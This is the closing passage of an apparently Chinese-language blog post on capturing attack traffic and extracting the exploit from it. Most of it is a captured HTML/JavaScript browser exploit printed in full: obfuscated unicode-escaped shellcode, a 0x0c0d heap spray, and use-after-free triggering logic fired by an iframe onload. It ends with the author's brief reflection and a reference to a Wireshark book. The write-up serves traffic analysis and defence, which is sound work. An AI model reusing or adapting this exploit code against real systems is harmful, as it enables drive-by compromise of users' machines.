u489f%u4398%u4390%u9193%u9937%uf592%u4942%u964b%u9193%u922f%u924b%u3748%u2f9b%u372f%u414b%u9741%ufcf9%u49f9%ud6f5%u91fc%u4643%u41fd%uf893%u3727%u4b93%u2f27%u909f%u4847%u49fd%u972f%ufd41%u479b%u3742%u48f8%u9146%u43d6%u9b27%u41fd%u9348%u2742%u3796%uf8f9%ufd49%u3f90%u9690%u9096%uf5fd%u2f99%u98fd%ufdfd%u432f%u96d6%u9342%ufc42%u4a98%u4e42%u9243%u4727%u939b%u47fd%u4193%u4a3f%u3f91%u929b%u9149%uf9f8%uf59b%u4849%u409b%u9796%u4b4f%u9797%uf548%u9041%u4948%u9141%u2743%u46f5%u3799%uf549%u9292%uf592%u4392%u9049%uf949%u4092%u4090%u3ff9%u4afd%u2f49%u4243%u4697%u9697%u9747%u434e%u92f8%u4741%u37f8%u9b2f%u46d6%u3791%ufd97%u489f%ud693%u2f96%u3797%u41fc%uf892%ufc93%ud699%u4792%u419b%u3f4b%u4f90%u9bfd%u493f%ufdf5%uf541%u439f%uf9f5%u909b%u4b99%u9093%ufd91%u2746%u989f%u4942%u97f8%u4897%u473f%u9337%ufc3f%uf9fd%u4e2f%u42f8%uf92f%u9690%u9096%u49d6%u9f9f%u9098%u9040%uf991%u4b27%u9f91%u4a48%u48f8%u3f43%u9937%u41d6%u994a%u424b%u4b96%u9146%u48f8%uf893%u472f%u982f%u4991%u4241%u9b42%u469b%u423f%u4f4e%u9792%u9296%ubf98%ua70b%u4afb%ud8db%uc929%u74d9%uf424%u4bb1%u315a%u127a%uea83%u03fc%ua971%ubf19%u7104%ub289%u85f9%udbce%u7a8c%u1c2f%uf3ee%u2dca%u673c%u1c9e%ue3f0%uacf2%ua17b%u27e6%u6e09%u8f08%u48a7%u1027%u5506%ud2eb%u2909%u06f6%u10e9%u5b39%u55e8%u9424%u0eb8%u0722%u3a2c%u9476%uec4d%ua4fc%u8935%u51c3%u908f%uc913%udb84%u618b%ufbc2%ua6aa%uc711%uc3e5%ub3e1%u05f7%u3b38%u69c6%u0296%u67e6%u43e7%u97c1%ubf92%u2531%u7ba4%uf14b%u9e21%u72eb%u7a91%u560d%u0847%u1301%u560c%ua206%uecc1%u2f32%u22e4%u6bb3%ue6c2%u289f%ube6b%u9e45%ua094%u7f22%uaa30%u94c1%uf142%u598d%u0a78%uf64e%u790b%u597c%u15a7%u12cc%ue161%u0933%u7dd5%ub2ca%u5725%ue609%ucf75%u87b8%u0f1e%u5244%u5fb0%u0dea%u3070%ufe4a%u5a18%u2145%u6538%u4a8f%u9fd2%ub558%uc48a%u5d52%u04c8%u7f73%ue245%u6f19%ubc03%u16b5%u360e%ud627%u3285%u5c67%uc229%u9526%ud044%u55df%u8a13%u6976%ua18e%uff76%u6034%u9720%u5536%u3806%ub0c9%uf11c%u7b5f%ufe4b%u7b8f%ua88b%u7bc5%u0ce3%u2fbd%u5316%u5c68%uc68b%u3592%u407f%ubbfa%ua6a6%u44a5%u368d%u929a%ubce8%u90ea%u7d18');
	var uafwHGfWUmxkIam = uKDkvADSMMCpMpWmBjzJRTRBOHuctmWYaRSFYKUgfGAorttjbgqtzbHoZkWlIhITyAOOkvmTpOpLxrfsUWzDUdnsdEwzsu("%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d");
	do {
		uafwHGfWUmxkIam += uafwHGfWUmxkIam
	} while (uafwHGfWUmxkIam.length < 0xd0000);
	for (S = 0; S < 150; S++) JsgdlqtHVnnWiFMCpdxJheQbdjITPhdkurJqwIMuMxJnHf[S] = uafwHGfWUmxkIam + mWgWGhyqOVxBPqtnAFWAyxhLnqBNaRNnkKvTfAwVuvOyCnGUwBPZEzSZtKpqGZUvPO;
}
function WisgEgTNEfaONekEqaMyAUALLMYW(cpznAZhGdtOhTCNSVGLRdYeEfCAPKMeztpQnoKTGKsjrhhkoxCWPz) {
	gGyfqFvCYPRmXbnUWzBrulnwZVAJpUifKDiAZEKOqNHrfziGDtUOBqjYCtATBhClJkXjezUcmxBlfEX();
	lTneQKOeMgwvXaqCPyQAaDDYAkd = document.createEventObject(cpznAZhGdtOhTCNSVGLRdYeEfCAPKMeztpQnoKTGKsjrhhkoxCWPz);
	document.getElementById("vhQYFCtoDnOzUOuxAflDSzVMIHYhjJojAOCHNZtQdlxSPFUeEthCGdRtiIY").innerHTML = "";
	window.setInterval(nayjNuSncnxGnhZDJrEXatSDkpo, 50);
}
function nayjNuSncnxGnhZDJrEXatSDkpo() {
	p = "\u0c0f\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";
	for (i = 0; i < MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul.length; i++) {
		MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul[i].data = p;
	}
	var t = lTneQKOeMgwvXaqCPyQAaDDYAkd.srcElement;
}
</script>
</head>
<body>
<span id="vhQYFCtoDnOzUOuxAflDSzVMIHYhjJojAOCHNZtQdlxSPFUeEthCGdRtiIY"><iframe src="/infowTVeeGDYJWNfsrdrvXiYApnuPoCMjRrSZuKtbVgwuZCXwxKjtEclbPuJPPctcflhsttMRrSyxl.gif" onload="WisgEgTNEfaONekEqaMyAUALLMYW(event)" /></span></body></html>
</body>
</html>

6. END

这次流量分析+样本提取,我算是知道了如何去捕获别人的攻击、以及根据别人的攻击流量提取出最关键的exp,感觉在这种流量捕获+分析中,任何加密的exp都能被捕获到,然后自己再分析并利用,看来exp也不能随便用,你也不知道对面是否开了流量监控等着你去攻击。



参考链接
参考书籍
《Wireshark数据包分析实战 第3版》 [美]克里斯·桑德斯(Chris Sanders)著,诸葛建伟、陆宇翔、曾皓辰 译